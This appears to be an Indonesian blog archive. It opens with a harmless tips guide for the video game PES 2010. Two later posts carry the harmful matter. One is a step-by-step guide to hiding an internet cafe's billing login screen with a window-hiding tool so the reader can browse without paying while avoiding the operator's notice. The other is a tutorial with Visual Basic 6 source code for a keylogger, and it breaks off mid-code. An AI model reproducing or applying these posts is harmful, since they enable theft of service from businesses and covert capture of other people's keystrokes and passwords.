Kamis, 25 Februari 2010

TRIK Pes 2010

Artikel ini saya tulis berdasarkan pengalaman pribadi saya dan sharing dengan teman- teman saya yang penggila WE / PES series. Perlu dipahami bahwa PES 2010 memiliki karakteristik game play (cara bermain) yang berbeda dengan seri PES sebelum - sebelumnya, meskipun basicly semua tombol dan kegunaannya (hampir) sama. Dengan kata lain orang yang jago (master) main PES 2009, belum tentu dia "langsung" bisa bermain expert di PES 2010, sebelum dia benar- benar banyak bermain (meningkatkan experience) dan memahami bagaimana cara bermain di seri terbaru PES ini (PES2010).

Perbedaan yang paling mendasar dari PES 2009 dan PES 2010 adalah bahwa PES 2010 lebih berat (lambat atau kurang gesit) gerakannya dikarenakan pengebirian atau pengurangan fungsi R2 yang semula di PES 2009 tombol ini membuat "seorang pemain macam messi bahkan pemain yang dianggap biasa- biasa saja" dapat bergerak lincah dengan akurasi dribbling yang luar biasa. Tetapi di PES 2010, tombol R2 ini tidak seampuh seperti pada PES2009, pasalnya ketika kita menahan tombol (R2) ini pemain hanya sekali melambatkan langkahnya dan tidak membuat dribblingnya semakin akurat . Bisa diasumsikan bahwa game play PES 2009 (seri sebelumnya) lebih tricky.

Dari segi pergerakan pemain (saat mendribbling), PES 2010 lebih terarah dalam passing -passing nya , dalam artian pemain (yang membawa bola) bergerak dalam sebuah rotasi (bisa berputar secara akurat) 360 derajat, jadi umpan yang diberikan mampu diarahkan dengan tepat ke segala arah (ingat! bukan ke pemain lain) bahkan bola mampu di umpankan ke tempat kosong secara tepat (gunakan manual pass, dengan rightstick/ analog kanan), pokoknya lebih akurat dibandingkan PES 2009.
Mungkin diskirpsi ini agak membingungkan bagi pembaca awam.
Lebih jelasnya begini, dalam PES 2009, ketika pemain mendribbling bola secara lurus kemudian secara tiba -tiba tombol arah sebaliknya ditekan,maka pemain tersebut akan membalikan badan dengan cepat (dengan luwesnya) (dalam baris berbaris gerakan ini mirip gerakan "BALIK KANAN"), tetapi dalam PES 2010 berbeda, pemain tidak bisa langsung "balik kanan" tetapi ber-rotasi (berputar perlahan bukan berbalik).
Makanya di PES 2010 ketika kita mencoba meng-gocek dan mengecoh lawan dengan tombol arah (misal tekan tombol serong kanan ,serong kiri dikombinasikan dengan tombol R1 dan kombinasi R2) tidak bisa efektif karena pengurangan fungsi dari tombol ini dan juga pengurangan kemampuan melewati pemain lawan secara head to head.

Factor lain yang membuat (PES 2010) pemain sulit menerobos (menggocek) barikade lawan adalah pengurangan intelejensi pemain. Kemampuan agility (kelincahan= ketangkasan) dan response ketika kehilangan bola sangat rendah bahkan untuk pemain sekaliber CR9, bandingkan dengan PES 2009, kita bisa menabrakan diri ke defender lawan dan bola melewati sela -sela kaki atau disamping pemain lawan kemudian bola yang telah lepas bisa dikejar kembali oleh pemain yang semula mendribbling bola, tapi di PES 2010 ini sulit dilakukan (tidak efektif).

Factor lain yang sangat dominan membedakan adalah di PES2010 kita tidak bisa sembarangan menekan tombol X, karena sekarang ada fitur cancel X, yaitu bila kita menekan X dua kali secara cepat. Tidak seperti PES 2009 dulu, bisa tekan X dengan cepat secara dan sembarangan + arah lalu umpan terarahpun tercipta, sepertinya tiktak (umpan cepat) tidak bisa digunakan seperti pada PES 2009. Terlebih bila pemain yang mengumpan (dalam PES2010) tidak dalam posisi yang baik (ter-pressing) maka umpannya pun lemah dan tidak terarah.

Bisa disimpulkan, pola bermain di PES 2010 ini bersifat "straight" (lurus), pola diagonal dan acak pada PES 2009 sudah diubah oleh KONAMI sebagai pengembangnya, tapi konsep ini dimaksudkan dalam pola ketika satu pemain "sendirian" mencoba meporakporandakan
pertahanan lawan. Tapi hebatnya KONAMI memaksa user untuk lebih bermain sebagai tim (teamwork), karena tak ada cara lain untuk bisa bermain dalam level expert.
Jadi user dikatakan "Master" dalam PES 2010 ini adalah user yang bisa bermain taktis dalam meracik strategi dan mengaplikasikan secara baik dalam pertandingan dan bermain sebagai satu kesatuan yang solid, bisa membaca dan menganalisa situasi secara cepat mampu mengkoordinasi kondisi timnya (secara tactics ini lebih mendetail dibanding PES 2009), jadi jangan berharap bisa bermain secara individu layaknya di PES 2009.

Semoga ulasan diatas bisa sedikit-banyak menjawab pertanyaan mengapa PES 2010 lebih kaku atau berbagai keluhan mengapa game paly nya sulit dimainkan.
Jadi buang jauh- jauh anggapan bahwa dengan satu atau dua pemain bisa menghancurkan pertahanan musuh dengan mudah. Disini kita dituntut menjadi user yang lebih pintar (secara intelejensi melalui aplikasi tactics), lebih tepatnya PERANG STRATEGI".

Meskipun tidak se-"tricky" PES 2009, PES 2010 mempunyai kualitas yang lebih baik dalam mendekati kenyataan, sama seperti konsep yang selalu diusung PES selama ini "PRO EVOLUTION FOOTBALL", yaitu proses evolusi simulasi sepakbola yang terus mendekati (bergerak dinamis) realita.

Terlepas dari semua itu, saya akan berbagi pengalaman mengenai tips dan trik PES 2010 (semoga membantu):

1. Freekick (presentase goal =99%):
Meskipun ini adalah cara curang (cheats), tapi bolehlah sekedar info.
Caranya: pilih penendang (usahakan penendang memiliki freekick accurasi diatas 80), kemudian tekan tombol start, lalu pilih player setting, geser kursormu menjadi "assisted", artinya biarlah CPU yang mengambil alih, lihatlah CPU mencetak skor untukmu. Setelah goal, geser kembali kursormu seperti semula (bisa unassisted ataupun semi-assisted,sesuai seleramu).
Kondisi yang harus terpenuhi adalah jarak ideal <30m (saya anjurkan lebih dekat lagi, karena ada kemungkinan CPU akan mengumpan bukan menembak langsung).
Bila freekick taker-nya adalah pemain sekelas Del Piero yang memiliki specialisasi bola- bola mati dan kondisi (form) sedang baik (atau bahkan on fire), presentase goalnya bahkan mencapai 99,9%.

2. Menghalau atau menggagalkan freekick lawan
Agar lawan mustahil untuk memasukan bola melalui freekick, tekan rapid kotak (tekan berulang- ulang dengan frekuensi yang cepat), semua pemain dalam pagar betis kita akan melakukan lompatan menghalau bola.
Dalam kondisi lawan memperoleh jarak ideal freekick, ada baiknya pagar betis ditambah (L1+arah atas).
Menurut analisa, "bug" yang bisa meng-kolong (melewati sela- sela) bagar betis telah diperbaiki, jadi kemungkinannya menjadi nol untuk menerobos pagar betis seperti pada PES 2009 yang lalu.

3. Melewati hadangan barisan bek (defender)
Untuk bisa melewati barikade (beberapa pemain musuh mengepung), caranya: tekan tombol arah depan 2x, pemain yang sedang mendribble akan melakukan gerakan special meng-kolong lawan. Ini efektif bila menggunakan pemain yang mempunyai stats exelent dalam mendribble. contoh: pato.
Biasanya cara ini cocok dimainkan oleh user yang gemar melakukan center attack.

4. Skoring memanfaatkan blunder Kiper (salah satu "BUG" PES 2010)
Kondisi yang musti dipenuhi adalah ketika kita melakukan penyerangan yang cenderung spontan (macam counter attack, tetapi tidak mutlak), biasanya serangan yang kita lancarkan dari tengah, perhatikan ketika pemain (kita) yang membawa bola mulai mendekat ke sekitar 1/4 dari sudut kotak penalty terluar secara otomatis kiper lawan akan maju kedepan dengan cara berlari kecil, ketika kiper sudah tidak on-position, maka bergeraklah (lari) serong untuk mencari celah dan melesatkan gol, terlihat jelas kiper akan melakukan tindakan bodoh (blunder) dengan membiarkan bola masuk ke gawang.

terlepas dari konteks diatas, biasanya saya mencetak goal dengan cara berjalan serong menuju tiang gawang (harus berada di dalam kotak penalty lawan), bila posisi kita di sisi kanan maka berlarilah ke kanan, kemudian menahan analog kiri (left stick) dengan arah serong kanan (karena diskripsi yang saya berikan, saya sedang berlari kekanan) lalu shoot, presentase goalnya sangat besar (biasanya bila masuk dengan cara terpental dulu ke kiper lalu masuk atau masuk begitu saja,terkadang mengkolong kiper).
bila dirumuskan: tahan left stick dengan arah serong + Kotak.

5. Corner Kick
Ada yang bilang kalau corner kick punya peluang gol 50:50, padahal presentasenya bisa sangat besar bila kita tahu triknya.
Cara Pertama adalah dengan memberikan umpan datar akurat dengan cara menekan tombol X (power gauge usahakan sama persis seperti saat anda biasa melakukan umpan lambung dengan tombol O) hal ini dilakukan agar kita bisa mengecoh lawan dengan memberikan anggapan pada lawan bahwa kita sedang memberikan umpan lambung, padahal tidak. Lalu teruskanlah umpan ke pemain yang berada didepan mulut gawang (sebelum itu diperlukan satu, dua, beberapa langkah kaki) lalu dengan cepat tekan Kotak (bisa sambil menekan tombol arah untuk mengarahkan bola kesudut yang diinginkan) untuk scoring.
Kesimpulan: corner taker memberi umpan (X) kepada pemain ke-2 lalu pemain meneruskan umpan (X) lalu pemain ke-3 sebagai eksekutor.
Tapi ingat! Ini bisa juga melakukan beberapa umpan (mungkin lebih dari 3) kemudian menunggu pemain eksekutor on-position baru ditembak.

Cara berikutnya adalah memberikan umpan lambung (cara klasik) :
geser posisi penendang 1/3 ke dalam, tunggu pemain yang ada di dalam kotak penalty lawan memperoleh posisi yang bagus lalu tekan O (powergauge =1/2 lebih sedikit) lalu setelah bola melayang ,tekan dan tahan arah (arah luar) untuk memberi efek parabol, lalu tekan rapid kotak + arah (sesuai posisi, lalu arahkan sundulannya).
Dalam kondisi tertentu dan pemain tertentu bisa menempatkan diri dengan cara mem-body untuk mempertahankan posisi untuk menyundul bola, nah inilah yang saya maksud dengan menunggu sampai pemain meperoleh posisi.

Terkadang ada cara corner kick seperti ini:
geser posisi penendang ke luar sedikit saja (relatif) ,tahan tombol arah atas + O (agar umpan lambung tidak terarah atau melayang secara random), efektif untuk tim yang mempunyai kualitas pemain yang unggul dalam duel udara macam Terry. Jangan lupa berikan arah ketika menyundul (dapat) bola agar arah bola terarah kegawang, gunakan juga rapid Kotak.

Untuk menggagalkan cara corner diatas adalah menempatkan salah satu pemain di depan gawang (1/4 tiang terdekat penendang lawan), ini dilakukan untuk mengkover lawan dan memberikan efek pressing agar pemain lawan yang bisa menyundul sekalipun akan tidak akurat.
Cara menggagalkan corner yang diumpan mendatar adalah mengkover (berdiri di depan) lawan yang posisinya paling dekat dengan penendang lawan (biasanya berdiri di dekat tiang terdekat sisi luar gawang kita).

6. Mengumpan di area kosong
Sangat efektif mengumpan ke pemain yang mempunyai kemampuan lari yang cepat (top speed + acceleration) macam david suazo.
Berbeda dengan umpan segitiga yang hanya bisa melewati satu pemain, maka kita gunakan manual pass (analog: right stick).
Caranya:
umpan dengan rigt stick kedepan (lihat area yang kosong) lihat timming, maka pemain yang terdekat dengan bola (kecuali pengumpan) akan beradu sprint dengan bek atau bahkan kiper lawan. Cara ini bisa diaplikasikan di tengah lapangan maupun sisi lapangan, lihat sikon!

Untuk user yang gemar bermain dengan gaya sayap, tempatkan satu winger dengan defensive low (atur di game plan) agar ketika counter attack, pemain ini bisa langsung merespon dan menang posisi. Caranya tekan L1 + right stick + arah kemana area yang dimaksudkan.

Bila sudah sangat terbiasa, menggunakan manual pass bisa dijadikan senjata andalan.

7. Kombinasi umpan satu - dua (one-two pass)
Tips inilah yang membedakan antara master dengan amatir, bila sudah sangat berpengalaman dengan alur bola melalui umpan - umpan. Ketika permainan berlangsung manfaatkan umpan biasa (X) + L1 walaupun CB yang sedang mengumpan ke SB, hal ini dilakukan untuk mengganggu konsentrasi pertahanan lawan karena CB juga bergerak ke depan, kemudian DMF (atau pemain tengah juga), bahkan kalau perlu lakukan L1+X untuk melakukan semua umpan. Sesekali lakukan one-two pass (L1+X, ketika pemain kita dapat posisi tekan X atau Segitiga). Untuk memberikan warna yang lebih baik ke dalam permainan kita, lakukan juga (X+R2) untuk memberikan gerakan yang tidak monoton yaitu mengumpan lalu mengikuti bola bahkan bisa diagonal larinya,kadang bisa lewat belakang pemain yang kita umpan (itulah efek X+R2). Kombinasikan juga dengan tombol Segitiga.
tombol pass yang digunakan= L1 X, X, X R2, Segitiga, L1 Segitiga, Segitiga R2.
Intinya lakukan kombinasi permainan dengan memainkan pola yang susah dibaca lawan dengan tombol pass L1+X, L1+X+X, (L1+X)+(L1+X), L1 X+ Segitiga, X R2+ R2 X, X R2 + Segitiga, danseterusnya. (dituntut kreatifitas anda).
Tambahan, penysunan strategi (tactics dalam gameplan) sangat berpengaruh dalam type permainan seperti ini,jadi efektivitas juga dipengaruhi dari aplikasi gameplan.

8. Penalty Kick
Yang perlu diperhatikan adalah tombol arah nya sudah berbeda dengan yang ada pada PES 2009.
Caranya: check di training mode

9. Goal Jarak Jauh (luar kotak penalty)
Ini mungkin terjadi apabila si penendang punya stats ability yang bagus macam Ronney, atau mungkin bahkan bisa siapa saja. Agar presentase goalnya mencapai 90%, caranya:
Larilah secara diagonal (menahan tombol serong) pastikan sudah ada minimal tiga langkah (usahakan tidak ada pressing yang berarti dari lawan), tetap tahan tombol arah serong lalu tekan Kotak (powergauge= setengah,bisa lebih sedikit saja), setelah bola melambung tekan R2 untuk memberi efek lengkung yang akurat.
Untuk presentase goal yang lebih besar, lakukan dijarak ideal gol, tidak bisa dilakukan di jarak yang memang mustahil untuk goal (dengan pertimbangan Stats=shoot power).

10. Meng-kolong kiper (ketika duel satu lawan satu)
Salah satu hal yang mengejutkan dari PES 2010 ini bagi saya adalah semakin mudahnya kiper dibobol bahkan di-kolong (goal dengan cara bola melewati sela kaki), bahkan blunder.
Cara meng-kolong kiper adalah mudah-mudah sulit (dibutuhkan timing dan feeling, serta insting):
caranya: rahasia

11. Mengkartumerahkan Kiper lawan:
Cara lama menggunakan cancel kick : Kotak(gauge on) + X.
Cara lain : saat berhadapan dengan kiper lawan buang bola dengan menggunakan manual pass (right stick) ke kanan atau kekiri, pokonya agar kiper lawan menabrak pemain kita yang sedang tanpa bola (dibutuhkan timing yang tepat).

12. Men-stop lawan ketika sedang one-on-one (dengan kiper)
Caranya: usahakan agar kiper kita tidak berlari membabi buta kearah lawan, alih- alih menghentikan bola, pemain lawan bisa dengan mudah membaca gerakan kiper kita.
Dengan cara menekan tombol L1 + Segitiga secara sesekali (ingat! bukan menahannya).

13. Cara merebut bola dari lawan secara efektif
Caranya : rahasia

14. Cara menggagalkan crossing lawan disisi lapangan
Tempel ketat pemain lawan yang membawa bola dengan berlari di sampingnya, bila beradu lari dengan winger yang mempunyai kecepatan diatas rata- rata, sesekali tekan R2 dan X, ingat untuk merebutnya tekan X dan bukan menabraknya tanpa X.
Lalu ketika ada indikasi pemain lawan hendak melepas umpas crossing, berdirlah (lari) disamping atau bisa menambahkan tahan tombol X.

15. spectaculer goal (goal dari tengah lapangan, jarak lebih dari 40m)
----- Meskipun presentase goal nya sangat rendah, namun ini patut dicoba. Paling tidak kita bisa memberikan efek kejut bagi lawan, dan bila tidak goal sekalipun kita bisa mendapat hadiah corner kick.
Caranya:
ketika kick off baru saja dimulai, giring bola (diperlukan beberapa langkah kaki) ,biasanya posisi pemain yang menendang masih di dalam garis lingkarang di tengah lapangan kemudian tekan tombol Kotak untuk shoot (powergauge sekitar 3/4) + arah depan + R2 (untuk memberi efek parabol).

Cara ini juga bisa dipakai ketika kita meng-counter attack, dengan asumsi bahwa kiper lawan tidak on-position (agak maju kedepan ketika timnya melakukan serangan). ingat! tembakan harus berada di setengah sisi lapangan lawan.
Inilah yang biasa disebut orang- orang dengan goal dari tengah lapangan.

16. Goal : tendangan salto (overhead kick)
----- Caranya :
melalui umpan silang lambung (tekan tombol O 2x = early cross, bisa juga hanya dengan menekan tombol O 1x) lalu setelah pemain kita mendapat umpan (usahakan agar posisi sipenerima umpan bebas), lalu gerakkan tombol arah (biasanya saya memakai analog rigt stick dengan cara setengah lingkaran atau kiri kanan dengan cepat), gerakan analog ini dilakukan untuk membuat bola yang diterima memantul di dada (pemain penerima umpan) agar bolanya agak melayang di dekat posisi kepala pemain, selanjutnya tekan tombol kotak (powergaugenya sedikit saja) + tombol arah (untuk mengarahkan tendangan salto).

17. Goal : menendang dengan menyilangkan kaki (posisi kaki menyerupai huruf X)
----- Metode ini biasanya hanya bisa dilakukan oleh pemain tertentu saja, syarat pemain yang bisa mendang dengan cara ini adalah pemain yang punya stats weak foot frequency 3 dan kebawah.

Yang akan saya contohkan adalah menggunakan Leonel Messi, karena Messi lemah menendang dengan kaki kanan, mulailah serangan ke sisi kanan (sisi kanannya Messi), giring bola sampai ke dekat tiang kanan (jarak Messi, kiper lawan, dan bibir gawang hanya beberapa yards saja), lalu "tahan" tombol arah (serong kanan) + tombol kotak.
Lihatlah Messi menendang dengan cara menyilangkan kakinya.
nb: bila tombol arah tidak ditahan, maka penendang hanya akan melakukan tendangan plessing saja.

18. quick change side attack
----- Caranya :
ketika bola dibawa oleh pemain sayap kita (bisa SB atau SMF), pokoknya yang sedang berada di sisi pinggir lapangan, umpanlah menggunakan O + R2 + arah kiri/kanan/diagonal, ini dilakukan untuk mengubah penyerangan bila tadinya di sisi kanan, secara cepat diubah ke serangan sisi kiri.
ini bisa memberikan variasi serangan yang beragam. Jangan ragu pula sesekali mengumpan dengan tombol O (bila perlu + R2 untuk umpan yang akurat).

19. fast counter attack efficienly
----- usahakan memasang penyerang yang memiliki specialisasi lolos dari jebakan offside dan mempunyai kemampuan lari tanpa bola yang cepat (acceleration + top speed). Taruh pemain ini di center area.
Caranya :
Ketika kita di serang, lalu setelah kita mematahkan serangan ini, bolapun kita kuasai, setelah itu bola digiring sampai jarak sekitar 20m dari gawang kita, tekan L1 + Segitiga + arah depan , untuk mengumpan lambung terobosan jauh kedepan, hal ini dilakukan untuk membuat pemain kita adu sprint dengan pemain belakang lawan yang tersisa. Inilah counter attack cepat yang efektif.
Metode ini baik digunakan untuk user yang gemar melakukan "direct football".

Cara ini juga bisa di improvisasi dengan memasang penyerang sayap (WF), cara hampir mirip dengan yang diatas, tekan tombol L1 + O + arah diagonal (sesuaikan dengan posisi WF).

20. Menipu wasit untuk memperoleh penalty kick
----- Caranya : ketika kita mencoba driving (menusuk) masuk ke dalam kotak penalty lawan, pemain lawan akan melakukan body charge menempel (pressing), ketika itu pula pemain lawan (yang menempel) body ballance nya dibawah pemain kita, biasanya dia akan menarik kaos pemain kita (dibutuhkan pengamatan yang jeli), manfaatkan moment ini untuk melakukan "diving" dengan cara menekan L1 + L2 + R1.

Cara lainya adalah melakukan diving ketika terjadi kemelut di depan gawang lawan, kondisi yang harus dipenuhi adalah posisi pemain (yang melakukan diving), relatif tidak terlihat dari pengawasan wasit.

Cara lainya lagi untuk memperoleh penalty tanpa mengecoh wasit adalah melakukan gerakan yang bisa mengkartumerahkan lawan yaitu (Kotak + X) agar pemain lawan men-sliding tackle pemain kita, resiko cidera juga sangat tinggi bagi pemain kita. Cara ini juga bisa diaplikasikan untuk mengkartu merahkan kiper lawan, alternatif lain untuk mengkartumerahkan kiper lawan adalah ketika one-on-one dengan kiper, buang bola ke kiri atau ke kanan (dengan manual pass= right stick) agar kiper menubruk pemain kita yang tanpa bola.

21. Goal : umpan throw in
----- Presentase goalnya memang kecil (sama dengan realita nyata), tapi ini bukan hal yang mustahil.
Caranya:
pertama pilih pengumpan yang mempunyai specialisasi long throw, usahakan memperoleh throw in di jarak ideal <16m dari bendera sudut lapangan terdekat, perhatikan pergerakan pemain kita yang ada di dalam kotak penalty lawan, bila sudah mendapat posisi yang bagus, tekan O + R2 + arah lalu Kotak. Terkadang cara ini bisa dikombinasikan agar tercipta overhead kick.

22. Goal : umpan silang menyusur tanah
Menurut saya inilah goal yang paling efektif dan paling mudah diaplikasikan.
caranya :
X lalu kotak
tingkat efisiensi goal dengan metode ini sangat tinggi sama seperti di PES 2008, meskipun posisi eksekutor tidak persis di depan gawang lawan (misal agak minggir, di sudut yang sempit) namun jika mengumpan (X) lalu langsung Shoot (Kotak), kemungkinanya sangat besar untuk menjadi goal, terutama striker pengeksekutor mempunyai level yang sekelas Diego Milito.

23. Goal : corner kick langsung masuk ke gawang
Goal : membuat lawan melakukan goal bunuh diri
----- Presentase goal yang sangat kecil membuat cara ini tidak efektif dipakai. Untuk peluang yang lebih besar lakukan metode ini di saat pertandingan sedang berlangsung (babak ke- dua, menit 80 keatas ketika stamina para pemain mulai down), bukan di training mode. Karena pergerakan liar para pemain (semua) yang berada di dalam kotak penalty lawan membuat kiper sesaat hilang fokus, terkadang pemain lawan (bukan kiper) juga jadi melakukan blunder goal bunuh diri.
caranya :
geser atau posisikan penendang cornerkick 1/3 kedalam (dari posisi samula) lalu tekan O (powergauge setengah lebih sedikit), setelah bola melambung tahan arah ke dalam (efek parabol), lalu tekan rapid Kotak (tekan kotak berulang-ulang dengan frekuensi cepat) ini memberikan efek siaga (agresivitas meningkat) menyundul bagi pemain terdekat yang dituju.
Gunakan penendang macam Pirlo yang mempunyai swerve yang istemewa.

24. Jangan ragu melakukan tembakan -tembakan ke arah gawang lawan setelah mendapatkan posisi yang bagus, karena meskipun tidak berbuah goal, bola terkadang memantul, kondisi ini bisa dimanfaatkan pemain lain untuk mencetak goal, cara ini sangat mujarab.

25. Ketika terjadi kemelut di depan gawang kita, jangan ragu membuang bola memakai tombol kotak, jangan memaksa mengumpan ke pemain lain, karena presentasi blunder sangat besar, lagipula umpan yang diarahkan tidak akan akurat karena posisi pengumpan tidak bagus (dalam kondisi tertekan). Saat berduel diudara pun gunakan tombol Kotak,jangan X, agar bola dihalau jauh dari gawang kita.

26. Dominasi penguasaan bola yang kita lakukan akan berdampak baik terhadap tenacity para pemain, secara psycologis mental para pemain akan terangkat, para pemain akan bermain lebih impresive, sebaliknya bila para pemain kita terlalu banyak kehilangan bola dibanding tim lawan (melakukan salah umpan sehingga terebut lawan) akan berakibat menurunnya kemampuan para pemain, mereka akan bermain di bawah performa standart mereka.
jadi, lakukanlah umpan- umpan yang terarah yang tepat, jangan terlalu banyak mengumpan dari sudut yang sulit, jangan pula terlalu banyak kehilangan bola.
tips menjaga bola agar tidak terebut dengan mudah dan mampu mendominasi pertandingan :
>>> lakukan "umpan - umpan mudah" sebanyak mungkin (untuk meningkatkan mental semua pemain). Jangan memberi umpan bagi pemain yang mati langkah (terkepung lawan) atau dalam posisi sulit.
>>> jangan memaksakan diri meneruskan (menggiring bola) ke depan saat ada pemain lawan di belakangnya, atau, bila cuma satu pemain, usahakan "punggung"i pemain lawan tersebut, lakukan gerakan rotasi memutar perlahan (bila perlu sampai 360 derajat), jagalah agar pemain lawan tetap tepat di belakang punggung kita.
Bila kondisinya tidak memungkinkan (ada 3 lawan), lebih baik umpankan saja bola ke belakang (ke pemain kita yang lain yang bebas)
>>> sesekali bolehlah melakukan umpan -umpan jauh yang terarah, agar bola tetap dalam penguasaan kita. Intinya ball possesion harus dominan di kita.
>>> jelilah mengamati kondisi strategi lawan, bila kita sabar memainkan pola ini, pertahanan lawan akan mulai tidak teratur (berantakan), manfaatkanlah celah ini untuk melakukan serangan efektif yang berkualitas.

Somoga tips dan trik ini bermanfaat, saya menunggu tambahan dari teman- teman gamer semua, terimakasih banyak..

Selasa, 16 Februari 2010

Hack Biilling ( CARA Ke-1 )

Ini dia caranya …
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah… udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan
Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Nah Gimana caranya?
Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.
Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.
Aku nemunya pas smp tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat (kalo perlu doa dulu, ato jampi-jampi)
Langkah-langkahnya:
01.
Masuk warnet dan pasang muka bego biar ga dicurigai operator
02.

Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03.

Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04.

Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05.

Saat masuk login screen, login aja seperti biasa.
06.

Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07.

Setelah ZHider dijalankan langsung aja logout.
08.

Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09.

Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10.

Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana
11.
Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12.
Logout. SIapkan muka bego, lalu bayar tarif.
=============================================>>>>>
Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.
Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.
===================================================
Warning !!
Peluang Berhasilnya Sangat Kecil , Mungkin Hanya 45% , But , Not Wrong To Try ^_^

Link Supertools 1.4 Minor

 http://www.ziddu.com/download/8579141/Supertools1.4Minor.rar.html
Bisa Juga Pesan Software !

Minggu, 14 Februari 2010

Membuat Keyloger Menggunkana VB 6.0 Versi Kedua

di tutor kali ini saya akan memberikan pencerahan :) tentang cara membuat KEYLOGGER di VisualBasic 6
Keylogger merupakan sebuah perangkat baik perangkat keras atau perangkat lunak yang digunakan untuk memantau penekanan tombol keyboard. Sebuah keylogger biasanya akan menyimpan hasil pemantauan penekanan tombol keyboard tersebut ke dalam sebuah berkas log/catatan/rekaman. Beberapa keylogger tertentu bahkan dapat mengirimkan hasil rekamannya ke e-mail tertentu secara periodik.[dari Wikipedia Indonesia]
langsung ja…
1. jalankan VB dan pilih Standard EXE
2. buat 6 buah timer dan satu buah textbox[beri nama textbox dengan "mated" tanpa tanda petik]
3. tekan CTRL + T untuk membuka Components window
4. centang opsi Microsoft Internet Transfer Control 6.0
5. tambahkan module ke program dengan klik menu Projects > Add Module dan ketik kode berikut:
Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
Declare Function SystemParamsLong Lib “user32″ Alias “SystemParametersInfoA” (ByVal uAction As Long, ByVal uParam As Long, lpvParam As Long, ByVal fuWinIni As Long) As Long
Const SPI_GETKEYBOARDSPEED = 10

6. kode untuk:
timer1:
‘ fungsi ini digunakan untuk mencatat aktifitas penekanan tombol keyboard
Private Sub Timer1_Timer()
If GetAsyncKeyState(vbKeyA) Then
mated = mated + “a”
ElseIf GetAsyncKeyState(vbKeyB) Then
mated = mated + “b”
ElseIf GetAsyncKeyState(vbKeyC) Then
mated = mated + “c”
ElseIf GetAsyncKeyState(vbKeyD) Then
mated = mated + “d”
ElseIf GetAsyncKeyState(vbKeyE) Then
mated = mated + “e”
ElseIf GetAsyncKeyState(vbKeyF) Then
mated = mated + “f”
ElseIf GetAsyncKeyState(vbKeyG) Then
mated = mated + “g”
ElseIf GetAsyncKeyState(vbKeyH) Then
mated = mated + “h”
ElseIf GetAsyncKeyState(vbKeyI) Then
mated = mated + “i”
ElseIf GetAsyncKeyState(vbKeyJ) Then
mated = mated + “j”
ElseIf GetAsyncKeyState(vbKeyK) Then
mated = mated + “k”
ElseIf GetAsyncKeyState(vbKeyL) Then
mated = mated + “l”
ElseIf GetAsyncKeyState(vbKeyM) Then
mated = mated + “m”
ElseIf GetAsyncKeyState(vbKeyN) Then
mated = mated + “n”
ElseIf GetAsyncKeyState(vbKeyO) Then
mated = mated + “o”
ElseIf GetAsyncKeyState(vbKeyP) Then
mated = mated + “p”
ElseIf GetAsyncKeyState(vbKeyQ) Then
mated = mated + “q”
ElseIf GetAsyncKeyState(vbKeyR) Then
mated = mated + “r”
ElseIf GetAsyncKeyState(vbKeyS) Then
mated = mated + “s”
ElseIf GetAsyncKeyState(vbKeyT) Then
mated = mated + “t”
ElseIf GetAsyncKeyState(vbKeyU) Then
mated = mated + “u”
ElseIf GetAsyncKeyState(vbKeyV) Then
mated = mated + “v”
ElseIf GetAsyncKeyState(vbKeyW) Then
mated = mated + “w”
ElseIf GetAsyncKeyState(vbKeyX) Then
mated = mated + “x”
ElseIf GetAsyncKeyState(vbKeyY) Then
mated = mated + “y”
ElseIf GetAsyncKeyState(vbKeyZ) Then
mated = mated + “z”
ElseIf GetAsyncKeyState(vbKey0) Then
mated = mated + “0″
ElseIf GetAsyncKeyState(vbKey1) Then
mated = mated + “1″
ElseIf GetAsyncKeyState(vbKey2) Then
mated = mated + “2″
ElseIf GetAsyncKeyState(vbKey3) Then
mated = mated + “3″
ElseIf GetAsyncKeyState(vbKey4) Then
mated = mated + “4″
ElseIf GetAsyncKeyState(vbKey5) Then
mated = mated + “5″
ElseIf GetAsyncKeyState(vbKey6) Then
mated = mated + “6″
ElseIf GetAsyncKeyState(vbKey7) Then
mated = mated + “7″
ElseIf GetAsyncKeyState(vbKey8) Then
mated = mated + “8″
ElseIf GetAsyncKeyState(vbKey9) Then
mated = mated + “9″
ElseIf GetAsyncKeyState(vbKeyEscape) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeySpace) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyBack) Then
mated = mated + “
